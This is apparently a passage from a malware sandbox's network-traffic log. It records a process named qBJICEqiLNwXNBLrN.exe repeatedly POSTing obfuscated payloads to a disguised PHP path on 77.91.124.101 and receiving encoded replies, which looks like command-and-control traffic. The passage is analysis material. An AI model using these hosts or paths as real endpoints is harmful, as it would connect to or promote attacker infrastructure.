VJ}]lTh[xrU\\|aZ_iwxPciOmMh}rRHccyOyqiIu_`}KxUKqvr^[\|qy\|I_P{v\|j`ka\mNwbn\\|_v}U`@~t{Kvv{\|\T\\|sr_xgk_{pMom\|]mbtzc\A}sw_oYoYi\wwq`zQA[\|gwSaNv\|\|A{RV``\@zqm~z{Oe[w`gKu_g\t_vP~]y_wbmvfthUuwop`\|xoxZz`fkmkQtwo^~ar}msoSvAia}{]FQhohc{T}Y}Y{~hYlq[kq}w\|P^WnsZOj\ptcqQ{\yKvX`~Hx~f_@wbk}byBwPyfhB}su\_va[J\|qXltwgKv_s{L}H}Nm{YZxY`x}cxbd{]~^tKxgxI}rsua\|I~RYpa_Nv\|pz\|dwNb{q_}BjAzavHvMUKu_ptqPNP@wbqOuutBlutB^B\|MpDy\|szprD}^AwwtNbv@}}wxS\~rW\|`h\|BZ}N\|}Yf{mg{\xF\|_{}Ic\|^yzcx~rRtM}ya}wf\|J\|vh~HytLY\|\S\|gr{vt@}cwur_Ltaa\|OT~ll@~IUvOw{\S}puD{Y`LxYhMymwKybRzc~{]NZxYoX}r`ZwqwXjs}dcQ\|amaRs]oo```T@zOv]i\|z_z\y\}b`g{ZL~JxYvMc\rYb[h\|Bz_c\|\|~ckZ{\|\|[xN_^~oRtgp~[zOzSYQoa@ir`wLh`]NbsITzZ@]o}UIoaxhacjIlU\|NyOzckY}boZwsjTy_[vedjd^\KQcdEQqHh_LnsTPod\[i_v\q~fI~\|^L}gUFv_sYyur^icDT{oZWdSo^Re\|\|\}kQ[U^cIWuDqXQ\QtAVdUHPY@bo]FWXv]}zPbzPUeLQrXXtt\|]bbA[}aWPcQZ[n[YfM`^ckpx\pZz{\|\ocDPqoWXdPS[aVRnMaTqBjey{_{ko@jlR`~G\|TV_TsBUbVCQ_RSfMPsaZc
Nov 21, 2023 04:47:26.359703064 CET	142	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 384 Expect: 100-continue
Nov 21, 2023 04:47:26.558056116 CET	143	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:26.558262110 CET	143	OUT	Data Raw: 57 50 58 51 5b 5b 5a 5d 5d 57 55 57 55 5c 57 5a 50 5f 58 43 56 57 57 52 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: WPXQ[[Z]]WUWU\WZP_XCVWWR^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'_)+>(.?0(8$.Z#95\+3=3$T98\<Y/>&G''^)/
Nov 21, 2023 04:47:26.762336969 CET	144	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:26 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 152 Content-Type: text/html; charset=UTF-8 Data Raw: 01 10 22 11 31 11 20 10 21 23 3f 56 3c 29 3d 53 39 00 03 1a 28 20 3e 03 31 3d 34 12 33 29 39 52 3d 3f 30 58 33 3a 37 0c 20 35 23 04 29 1a 21 5a 0c 1d 26 5a 21 2b 2c 0f 29 2e 01 00 2b 04 20 5c 26 1f 0e 05 28 10 33 51 23 0a 30 01 24 20 20 57 2f 3f 3d 5e 2d 3b 3e 06 31 02 2a 1d 23 3d 23 5f 0c 14 27 53 21 1f 28 07 20 09 39 09 35 51 24 5e 37 24 09 1f 27 2e 33 0c 26 2b 21 17 28 06 20 1f 31 19 24 55 30 5c 37 53 26 5f 2b 1e 28 3a 26 54 2a 0e 2b 48 02 36 5a 50 Data Ascii: "1 !#?V<)=S9( >1=43)9R=?0X3:7 5#)!Z&Z!+,).+ \&(3Q#0$ W/?=^-;>1#=#_'S!( 95Q$^7$'.3&+!( 1$U0\7S&_+(:&T+H6ZP
Nov 21, 2023 04:47:26.782782078 CET	144	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 1408 Expect: 100-continue
Nov 21, 2023 04:47:26.982301950 CET	147	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:26.982625008 CET	149	OUT	Data Raw: 57 5b 5d 5e 5b 52 5f 5a 5d 57 55 57 55 5b 57 55 50 58 58 43 56 5f 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: W[]^[R_Z]WUWU[WUPXXCV_W_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'=5(+%?07;Z4:!^?U*'>"W30U,8)(?,&G''^)3
Nov 21, 2023 04:47:27.184570074 CET	149	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:26 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 152 Content-Type: text/html; charset=UTF-8 Data Raw: 01 10 22 58 26 01 20 1f 34 23 01 1e 2b 04 0f 50 39 3e 3e 06 3c 0d 25 5b 26 2d 30 5e 30 3a 3d 16 3f 3f 33 03 30 3a 2c 56 37 18 30 10 2a 1a 21 5a 0c 1d 26 5a 35 01 2f 56 2b 2e 0d 04 2b 5b 20 5e 27 22 20 06 2b 10 28 0b 23 0d 23 1f 25 55 38 57 2f 2c 2e 02 2d 3b 22 42 32 2c 00 5f 20 2d 23 5f 0c 14 27 1a 35 57 3b 59 23 20 07 09 23 24 38 15 20 0a 33 1c 27 3d 2c 1d 27 2b 32 04 3f 28 24 53 26 37 3c 55 33 03 20 0d 25 5f 3f 54 29 2a 26 54 2a 0e 2b 48 02 36 5a 50 Data Ascii: "X& 4#+P9>><%[&-0^0:=??30:,V70!Z&Z5/V+.+[ ^'" +(##%U8W/,.-;"B2,_ -#_'5W;Y# #$8 3'=,'+2?($S&7<U3 %_?T)&T*+H6ZP

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49712	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:24.543304920 CET	139	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:24.740185022 CET	139	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:24.741302967 CET	140	OUT	Data Raw: 00 0b 04 0c 03 0d 01 07 05 06 02 01 02 03 01 01 00 05 05 0e 02 07 03 0d 00 52 0f 00 03 0f 01 03 0f 02 04 09 01 07 03 05 0b 07 05 04 06 07 04 01 05 05 0c 0e 0f 53 05 52 01 02 04 56 04 55 05 0f 00 04 0f 5c 07 04 01 08 0c 50 0c 54 0a 0d 0f 00 04 04 Data Ascii: RSRVU\PTRQU\L~hNPvqv]aKt\|f_`RxM`c_llcHxYa[hSwQwwZiO~V@xSn}Le
Nov 21, 2023 04:47:25.036397934 CET	140	IN	Data Raw: 64 79 0e 7d 59 7a 63 71 5b 46 5b 69 00 67 41 53 75 40 09 63 04 5e 46 6a 04 7e 43 56 64 06 09 55 5c 55 77 6a 60 03 5c 71 5c 57 5f 6c 58 01 44 68 62 06 41 69 6b 7c 4a 79 5e 56 5f 5a 06 70 43 51 61 5c 40 51 58 01 59 54 01 0c 04 57 64 0c 59 54 57 60 Data Ascii: dy}Yzcq[F[igASu@c^Fj~CVdU\Uwj`\q\W_lXDhbAik\|Jy^V_ZpCQa\@QXYTWdYTW`uUg]\|]X_`blZzp]ia@Z}c^RoTkMVrXLboaUwEcg~}^bPUAofzBqZR_ZwE]bSISXD`njE\yoSkkypRh}]hDxkA\|YW_P{J]d]FRZKQVTaejqe^}]xA\|QN~NtzZ@]odEUqIk^FkdH
Nov 21, 2023 04:47:25.036421061 CET	141	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:24 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 1340 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 56 4a 7d 5d 6c 54 68 5b 78 72 55 5c 7c 61 5a 5f 69 77 78 50 7f 63 69 4f 6d 4d 68 01 7d 72 52 48 63 63 79 4f 79 71 69 49 75 5f 60 00 7d 4b 78 01 55 4b 71 0c 76 72 5e 5b 7c 71 79 05 7c 49 5f 50 7b 76 7c 0a 6a 60 6b 04 61 5c 6d 4e 77 62 6e 5c 7c 5f 76 03 7d 55 60 40 7e 74 7b 4b 76 76 7b 06 7c 5c 54 5c 7c 73 72 5f 78 67 6b 5f 7b 01 70 4d 6f 6d 7c 5d 6d 62 74 05 7a 63 5c 41 7d 73 77 5f 6f 59 6f 59 69 5c 77 03 77 71 60 02 7a 51 41 5b 7c 67 77 53 7f 07 61 4e 76 7c 7c 41 7b 52 56 05 60 60 5c 40 7a 71 6d 05 7e 7f 7a 04 7b 4f 65 5b 77 60 67 4b 75 5f 67 5c 74 5f 76 50 7e 5d 79 5f 77 62 6d 01 76 66 74 09 68 55 75 01 77 6f 70 04 7f 60 7c 02 78 6f 78 5a 7a 60 66 03 6b 6d 6b 51 74 77 6f 5e 7e 61 72 09 7d 6d 73 08 6f 53 76 41 69 61 7d 07 7b 5d 46 51 68 6f 68 08 7f 63 7b 54 7d 59 7d 59 7b 7e 68 59 6c 71 7f 5b 6b 71 7f 07 7d 77 7c 50 7f 5e 57 0c 6e 73 5a 4f 6a 5c 70 01 74 63 71 51 7b 5c 79 4b 76 58 60 02 7e 48 78 04 7e 66 5f 40 77 62 6b 02 7d 62 79 42 7f 77 50 08 79 66 68 42 7d 73 7f 00 75 5c 5f 07 76 61 5b 4a 7c 71 58 01 7f 6c 74 0b 7f 77 67 4b 76 5f 73 04 7b 4c 7d 48 7d 4e 6d 06 7b 59 5a 07 78 59 60 01 78 7d 63 01 78 62 64 01 7b 5d 7e 04 7f 5e 74 4b 78 67 78 49 7d 72 73 05 75 61 7c 49 7e 52 7f 07 7f 59 70 0a 7f 61 5f 4e 76 7c 70 02 7a 7c 64 00 77 4e 62 0c 7b 71 5f 00 7d 42 6a 41 7a 61 76 48 76 4d 55 4b 75 5f 70 04 74 71 50 0a 7f 4e 50 40 77 62 71 4f 75 75 74 42 7f 6c 75 06 74 42 5e 42 7c 4d 70 44 79 7c 73 00 7a 70 72 44 7f 7d 5e 41 77 77 74 4e 7f 62 76 40 7d 7d 77 0d 78 53 5c 04 7e 72 57 07 7c 60 68 09 7c 42 5a 08 7d 4e 7c 08 7d 59 66 01 7b 6d 67 00 7b 5c 78 46 7c 5f 7b 00 7d 49 63 0c 7c 5e 79 0c 7a 63 78 00 7e 72 52 02 74 4d 7d 0c 79 61 7d 06 77 66 7c 4a 7c 76 68 02 7e 48 79 0c 74 4c 59 03 7c 5c 53 01 7c 67 72 0b 7b 76 74 40 7d 63 77 00 75 72 5f 4c 74 61 61 02 7c 4f 54 00 7e 6c 6c 40 7e 49 55 06 76 4f 77 04 7b 5c 53 02 7d 70 75 44 7b 59 60 4c 78 59 68 4d 79 6d 77 4b 79 62 52 01 7a 63 7e 03 7b 5d 4e 5a 78 59 6f 58 7d 72 60 5a 77 71 77 58 6a 0a 73 00 7d 64 63 51 7c 61 6d 0c 61 52 73 5d 6f 6f 60 04 60 60 54 40 7a 4f 76 5d 69 7c 7a 5f 7a 5c 79 05 5c 07 0f 7d 62 60 67 7b 5a 4c 7e 4a 78 59 76 4d 63 5c 72 59 62 5b 68 0a 7c 42 7a 5f 63 7c 7c 06 7e 63 6b 5a 7b 7c 7c 5b 78 4e 5f 5e 7f 7e 6f 52 74 67 70 02 7e 5b 7a 4f 7a 53 59 51 6f 0b 61 40 69 05 72 06 60 06 77 4c 68 60 5d 4e 62 73 49 54 7a 5a 40 5d 6f 7d 55 49 6f 61 78 03 68 61 63 07 6a 49 6c 55 7c 4e 79 4f 7a 63 6b 59 7d 62 6f 5a 77 73 6a 54 79 5f 5b 00 76 65 64 06 6a 00 64 5e 7f 5c 4b 51 63 04 64 45 51 71 48 04 68 01 5f 4c 6e 01 73 54 50 6f 64 5c 5b 05 69 5f 76 5c 71 04 7e 66 07 49 7e 7c 5e 4c 7d 67 55 46 76 5f 73 59 79 75 72 5e 69 63 01 44 54 7b 6f 5a 57 64 0c 53 6f 0b 5e 01 52 65 7c 07 7c 5c 7d 07 6b 06 51 5b 55 5e 63 49 57 75 7f 44 71 58 51 5c 51 0b 74 41 56 64 55 48 50 59 0d 40 62 6f 5d 46 57 0a 05 58 76 5d 7d 7a 50 62 7a 01 50 55 65 4c 51 72 58 58 74 74 7c 5d 62 62 0c 41 5b 7d 61 57 50 63 06 51 5a 5b 6e 5b 59 66 00 4d 60 0a 09 5e 63 6b 70 03 78 5c 70 5a 7a 7b 7c 5c 6f 63 0a 44 50 71 6f 57 58 64 0c 50 53 5b 61 56 52 6e 0f 4d 61 54 71 42 6a 65 79 01 7b 5f 7b 09 6b 0b 6f 40 6a 6c 7f 08 52 60 7e 47 7c 54 56 5f 54 05 73 42 55 62 56 43 51 5f 0f 52 53 07 66 4d 50 7f 73 00 61 04 0c 5a 63 Data Ascii: VJ}]lTh[xrU\\|aZ_iwxPciOmMh}rRHccyOyqiIu_`}KxUKqvr^[\|qy\|I_P{v\|j`ka\mNwbn\\|_v}U`@~t{Kvv{\|\T\\|sr_xgk_{pMom\|]mbtzc\A}sw_oYoYi\wwq`zQA[\|gwSaNv\|\|A{RV``\@zqm~z{Oe[w`gKu_g\t_vP~]y_wbmvfthUuwop`\|xoxZz`fkmkQtwo^~ar}msoSvAia}{]FQhohc{T}Y}Y{~hYlq[kq}w\|P^WnsZOj\ptcqQ{\yKvX`~Hx~f_@wbk}byBwPyfhB}su\_va[J\|qXltwgKv_s{L}H}Nm{YZxY`x}cxbd{]~^tKxgxI}rsua\|I~RYpa_Nv\|pz\|dwNb{q_}BjAzavHvMUKu_ptqPNP@wbqOuutBlutB^B\|MpDy\|szprD}^AwwtNbv@}}wxS\~rW\|`h\|BZ}N\|}Yf{mg{\xF\|_{}Ic\|^yzcx~rRtM}ya}wf\|J\|vh~HytLY\|\S\|gr{vt@}cwur_Ltaa\|OT~ll@~IUvOw{\S}puD{Y`LxYhMymwKybRzc~{]NZxYoX}r`ZwqwXjs}dcQ\|amaRs]oo```T@zOv]i\|z_z\y\}b`g{ZL~JxYvMc\rYb[h\|Bz_c\|\|~ckZ{\|\|[xN_^~oRtgp~[zOzSYQoa@ir`wLh`]NbsITzZ@]o}UIoaxhacjIlU\|NyOzckY}boZwsjTy_[vedjd^\KQcdEQqHh_LnsTPod\[i_v\q~fI~\|^L}gUFv_sYyur^icDT{oZWdSo^Re\|\|\}kQ[U^cIWuDqXQ\QtAVdUHPY@bo]FWXv]}zPbzPUeLQrXXtt\|]bbA[}aWPcQZ[n[YfM`^ckpx\pZz{\|\ocDPqoWXdPS[aVRnMaTqBjey{_{ko@jlR`~G\|TV_TsBUbVCQ_RSfMPsaZc
Nov 21, 2023 04:47:26.359703064 CET	142	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 384 Expect: 100-continue
Nov 21, 2023 04:47:26.558056116 CET	143	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:26.558262110 CET	143	OUT	Data Raw: 57 50 58 51 5b 5b 5a 5d 5d 57 55 57 55 5c 57 5a 50 5f 58 43 56 57 57 52 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: WPXQ[[Z]]WUWU\WZP_XCVWWR^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'_)+>(.?0(8$.Z#95\+3=3$T98\<Y/>&G''^)/
Nov 21, 2023 04:47:26.762336969 CET	144	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:26 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 152 Content-Type: text/html; charset=UTF-8 Data Raw: 01 10 22 11 31 11 20 10 21 23 3f 56 3c 29 3d 53 39 00 03 1a 28 20 3e 03 31 3d 34 12 33 29 39 52 3d 3f 30 58 33 3a 37 0c 20 35 23 04 29 1a 21 5a 0c 1d 26 5a 21 2b 2c 0f 29 2e 01 00 2b 04 20 5c 26 1f 0e 05 28 10 33 51 23 0a 30 01 24 20 20 57 2f 3f 3d 5e 2d 3b 3e 06 31 02 2a 1d 23 3d 23 5f 0c 14 27 53 21 1f 28 07 20 09 39 09 35 51 24 5e 37 24 09 1f 27 2e 33 0c 26 2b 21 17 28 06 20 1f 31 19 24 55 30 5c 37 53 26 5f 2b 1e 28 3a 26 54 2a 0e 2b 48 02 36 5a 50 Data Ascii: "1 !#?V<)=S9( >1=43)9R=?0X3:7 5#)!Z&Z!+,).+ \&(3Q#0$ W/?=^-;>1#=#_'S!( 95Q$^7$'.3&+!( 1$U0\7S&_+(:&T+H6ZP
Nov 21, 2023 04:47:26.782782078 CET	144	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 1408 Expect: 100-continue
Nov 21, 2023 04:47:26.982301950 CET	147	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:26.982625008 CET	149	OUT	Data Raw: 57 5b 5d 5e 5b 52 5f 5a 5d 57 55 57 55 5b 57 55 50 58 58 43 56 5f 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: W[]^[R_Z]WUWU[WUPXXCV_W_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'=5(+%?07;Z4:!^?U*'>"W30U,8)(?,&G''^)3
Nov 21, 2023 04:47:27.184570074 CET	149	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:26 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 152 Content-Type: text/html; charset=UTF-8 Data Raw: 01 10 22 58 26 01 20 1f 34 23 01 1e 2b 04 0f 50 39 3e 3e 06 3c 0d 25 5b 26 2d 30 5e 30 3a 3d 16 3f 3f 33 03 30 3a 2c 56 37 18 30 10 2a 1a 21 5a 0c 1d 26 5a 35 01 2f 56 2b 2e 0d 04 2b 5b 20 5e 27 22 20 06 2b 10 28 0b 23 0d 23 1f 25 55 38 57 2f 2c 2e 02 2d 3b 22 42 32 2c 00 5f 20 2d 23 5f 0c 14 27 1a 35 57 3b 59 23 20 07 09 23 24 38 15 20 0a 33 1c 27 3d 2c 1d 27 2b 32 04 3f 28 24 53 26 37 3c 55 33 03 20 0d 25 5f 3f 54 29 2a 26 54 2a 0e 2b 48 02 36 5a 50 Data Ascii: "X& 4#+P9>><%[&-0^0:=??30:,V70!Z&Z5/V+.+[ ^'" +(##%U8W/,.-;"B2,_ -#_'5W;Y# #$8 3'=,'+2?($S&7<U3 %_?T)&T*+H6ZP

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	77.91.124.101	80	192.168.2.5	49713	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:26.683871984 CET	144	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue
Nov 21, 2023 04:47:26.881618023 CET	145	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:26.881994009 CET	147	OUT	Data Raw: 57 5d 5d 5e 5e 5d 5a 50 5d 57 55 57 55 5a 57 52 50 59 58 48 56 50 57 52 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: W]]^^]ZP]WUWUZWRPYXHVPWR^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$=((%=U#[.4) 9)^?3&=.'&T..]+< /.&G''^)7
Nov 21, 2023 04:47:27.085913897 CET	149	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:26 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.5	49713	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:26.683871984 CET	144	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue
Nov 21, 2023 04:47:26.881618023 CET	145	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:26.881994009 CET	147	OUT	Data Raw: 57 5d 5d 5e 5e 5d 5a 50 5d 57 55 57 55 5a 57 52 50 59 58 48 56 50 57 52 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: W]]^^]ZP]WUWUZWRPYXHVPWR^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$=((%=U#[.4) 9)^?3&=.'&T..]+< /.&G''^)7
Nov 21, 2023 04:47:27.085913897 CET	149	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:26 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.5	49722	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:32.493082047 CET	179	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:32.690172911 CET	181	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:32.690422058 CET	183	OUT	Data Raw: 57 51 58 5f 5e 5e 5a 5b 5d 57 55 57 55 5a 57 51 50 59 58 40 56 51 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: WQX_^^Z[]WUWUZWQPYX@VQW_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$+(1<81*0+;7& )!?U='>P&3",8=+';&G''^)7
Nov 21, 2023 04:47:32.893771887 CET	184	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:32 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	77.91.124.101	80	192.168.2.5	49722	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:32.493082047 CET	179	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:32.690172911 CET	181	IN	HTTP/1.1 100 Continue
